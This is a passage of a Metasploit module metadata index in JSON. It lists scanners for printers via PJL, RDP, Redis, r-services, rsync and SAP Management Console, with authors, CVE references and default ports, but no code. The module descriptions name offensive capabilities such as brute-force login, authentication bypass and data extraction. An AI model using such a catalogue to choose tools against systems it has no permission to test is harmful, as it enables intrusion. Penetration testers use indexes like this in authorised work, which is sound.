"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_delete_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_download_file": {
"name": "Printer File Download Scanner",
"full_name": "auxiliary/scanner/printer/printer_download_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module downloads a file from a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_download_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_env_vars": {
"name": "Printer Environment Variables Scanner",
"full_name": "auxiliary/scanner/printer/printer_env_vars",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni"
],
"description": "This module scans for printer environment variables using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_env_vars",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_list_dir": {
"name": "Printer Directory Listing Scanner",
"full_name": "auxiliary/scanner/printer/printer_list_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module lists a directory on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_list_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_list_volumes": {
"name": "Printer Volume Listing Scanner",
"full_name": "auxiliary/scanner/printer/printer_list_volumes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module lists the volumes on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_list_volumes",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_ready_message": {
"name": "Printer Ready Message Scanner",
"full_name": "auxiliary/scanner/printer/printer_ready_message",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module scans for and optionally changes the printer ready message on\n a set of printers using the Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_ready_message",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_upload_file": {
"name": "Printer File Upload Scanner",
"full_name": "auxiliary/scanner/printer/printer_upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module uploads a file to a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/printer/printer_version_info": {
"name": "Printer Version Information Scanner",
"full_name": "auxiliary/scanner/printer/printer_version_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module scans for printer version information using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
"is_install_path": true,
"ref_name": "scanner/printer/printer_version_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/quake/server_info": {
"name": "Gather Quake Server Information",
"full_name": "auxiliary/scanner/quake/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the getstatus or getinfo request to obtain\n information from a Quakeserver.",
"references": [
"URL-ftp://ftp.idsoftware.com/idstuff/quake3/docs/server.txt"
],
"platform": "",
"arch": "",
"rport": 27960,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/quake/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/quake/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rdp/ms12_020_check": {
"name": "MS12-020 Microsoft Remote Desktop Checker",
"full_name": "auxiliary/scanner/rdp/ms12_020_check",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis \"R3dy\" <rdavis@accuvant.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module checks a range of hosts for the MS12-020 vulnerability.\n This does not cause a DoS on the target.",
"references": [
"CVE-2012-0002",
"MSB-MS12-020",
"URL-http://technet.microsoft.com/en-us/security/bulletin/ms12-020",
"EDB-18606",
"URL-https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rdp/ms12_020_check.rb",
"is_install_path": true,
"ref_name": "scanner/rdp/ms12_020_check",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rdp/rdp_scanner": {
"name": "Identify endpoints speaking the Remote Desktop Protocol (RDP)",
"full_name": "auxiliary/scanner/rdp/rdp_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to connect to the specified Remote Desktop Protocol port\n and determines if it speaks RDP.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/cc240445.aspx"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-09 21:32:15 +0000",
"path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/rdp/rdp_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/file_upload": {
"name": "Redis File Upload",
"full_name": "auxiliary/scanner/redis/file_upload",
"rank": 300,
"disclosure_date": "2015-11-11",
"type": "auxiliary",
"author": [
"Nixawk",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can be used to leverage functionality exposed by Redis to\n achieve somewhat arbitrary file upload to a file and directory to\n which the user account running the redis instance has access. It is\n not totally arbitrary because the exact contents of the file cannot\n be completely controlled given the nature of how Redis stores its\n database on disk.",
"references": [
"URL-http://antirez.com/news/96",
"URL-http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/",
"URL-http://redis.io/topics/protocol"
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/file_upload.rb",
"is_install_path": true,
"ref_name": "scanner/redis/file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/redis_login": {
"name": "Redis Login Utility",
"full_name": "auxiliary/scanner/redis/redis_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to authenticate to an REDIS service.",
"references": [
"URL-http://redis.io/topics/protocol"
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/redis_login.rb",
"is_install_path": true,
"ref_name": "scanner/redis/redis_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/redis/redis_server": {
"name": "Redis Command Execute Scanner",
"full_name": "auxiliary/scanner/redis/redis_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"iallison <ian@team-allison.com>",
"Nixawk"
],
"description": "This module locates Redis endpoints by attempting to run a specified\n Redis command.",
"references": [
],
"platform": "",
"arch": "",
"rport": 6379,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/redis/redis_server.rb",
"is_install_path": true,
"ref_name": "scanner/redis/redis_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rogue/rogue_recv": {
"name": "Rogue Gateway Detection: Receiver",
"full_name": "auxiliary/scanner/rogue/rogue_recv",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module listens for replies to the requests sent by\n the rogue_send module. The RPORT, CPORT, and ECHOID values\n must match the rogue_send parameters used exactly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb",
"is_install_path": true,
"ref_name": "scanner/rogue/rogue_recv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rogue/rogue_send": {
"name": "Rogue Gateway Detection: Sender",
"full_name": "auxiliary/scanner/rogue/rogue_send",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module send a series of TCP SYN and ICMP ECHO requests\n to each internal target host, spoofing the source address of an external\n system running the rogue_recv module. This allows the system running\n the rogue_recv module to determine what external IP a given internal\n system is using as its default route.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
"is_install_path": true,
"ref_name": "scanner/rogue/rogue_send",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rexec_login": {
"name": "rexec Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rexec_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test an rexec service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 512,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rexec_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rlogin_login": {
"name": "rlogin Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rlogin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test an rlogin service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 513,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rlogin_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rservices/rsh_login": {
"name": "rsh Authentication Scanner",
"full_name": "auxiliary/scanner/rservices/rsh_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will test a shell (rsh) service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).",
"references": [
"CVE-1999-0651",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
"is_install_path": true,
"ref_name": "scanner/rservices/rsh_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/rsync/modules_list": {
"name": "List Rsync Modules",
"full_name": "auxiliary/scanner/rsync/modules_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ikkini",
"Jon Hart <jon_hart@rapid7.com>",
"Nixawk"
],
"description": "An rsync module is essentially a directory share. These modules can\n optionally be protected by a password. This module connects to and\n negotiates with an rsync server, lists the available modules and,\n optionally, determines if the module requires a password to access.",
"references": [
"URL-http://rsync.samba.org/ftp/rsync/rsync.html"
],
"platform": "",
"arch": "",
"rport": 873,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
"is_install_path": true,
"ref_name": "scanner/rsync/modules_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_ctc_verb_tampering_user_mgmt": {
"name": "SAP CTC Service Verb Tampering User Management",
"full_name": "auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexandr Polyakov",
"nmonkee"
],
"description": "This module exploits an authentication bypass vulnerability in SAP NetWeaver\n CTC service. The service is vulnerable to verb tampering allowing for unauthorised\n OS user management. Information about resolution should be available at SAP notes\n 1589525 and 1624450 (authentication required).",
"references": [
"URL-http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_hostctrl_getcomputersystem": {
"name": "SAP Host Agent Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_hostctrl_getcomputersystem",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module attempts to retrieve Computer and OS info from Host Agent\n through the SAP HostControl service.",
"references": [
"CVE-2013-3319",
"OSVDB-95616",
"BID-61402",
"URL-https://service.sap.com/sap/support/notes/1816536",
"URL-http://labs.integrity.pt/advisories/cve-2013-3319/"
],
"platform": "",
"arch": "",
"rport": 1128,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
1128
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_icf_public_info": {
"name": "SAP ICF /sap/public/info Service Sensitive Information Gathering",
"full_name": "auxiliary/scanner/sap/sap_icf_public_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee",
"ChrisJohnRiley"
],
"description": "This module uses the /sap/public/info service within SAP Internet Communication\n Framework (ICF) to obtain the operating system version, SAP version, IP address\n and other information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_icf_public_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_icm_urlscan": {
"name": "SAP URL Scanner",
"full_name": "auxiliary/scanner/sap/sap_icm_urlscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module scans for commonly found SAP Internet Communication Manager URLs\n and outputs return codes for the user.",
"references": [
"CVE-2010-0738"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_icm_urlscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_abaplog": {
"name": "SAP Management Console ABAP Syslog Disclosure",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_abaplog",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_abaplog",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_brute_login": {
"name": "SAP Management Console Brute Force",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to brute force the username and\n password for the SAP Management Console SOAP Interface. If\n the SAP_SID value is set it will replace instances of <SAPSID>\n in any user/pass from any wordlist.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_extractusers": {
"name": "SAP Management Console Extract Users",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_extractusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to extract SAP users from the ABAP\n Syslog through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_extractusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getaccesspoints": {
"name": "SAP Management Console Get Access Points",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to output a list of SAP access points through the\n SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getenv": {
"name": "SAP Management Console getEnvironment",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getenv",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify SAP Environment\n settings through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getenv",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getlogfiles": {
"name": "SAP Management Console Get Logfile",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getlogfiles",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module simply attempts to download available logfiles and\n developer tracefiles through the SAP Management Console SOAP\n Interface. Please use the sap_mgmt_con_listlogfiles\n extension to view a list of available files.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getprocesslist": {
"name": "SAP Management Console GetProcessList",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getprocesslist",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Bruno Morisson <bm@integrity.pt>"
],
"description": "This module attempts to list SAP processes through the SAP Management Console SOAP Interface",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_getprocessparameter": {
"name": "SAP Management Console Get Process Parameters",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to output a SAP process parameters and\n configuration settings through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_instanceproperties": {
"name": "SAP Management Console Instance Properties",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_instanceproperties",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify the instance properties\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_listconfigfiles": {
"name": "SAP Management Console List Config Files",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Jacobo Avariento Gimeno"
],
"description": "This module attempts to list the config files\n through the SAP Management Console SOAP Interface.\n Returns a list of config files found in the SAP configuration with its\n absolute paths inside the server filesystem.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_listlogfiles": {
"name": "SAP Management Console List Logfiles",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_listlogfiles",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
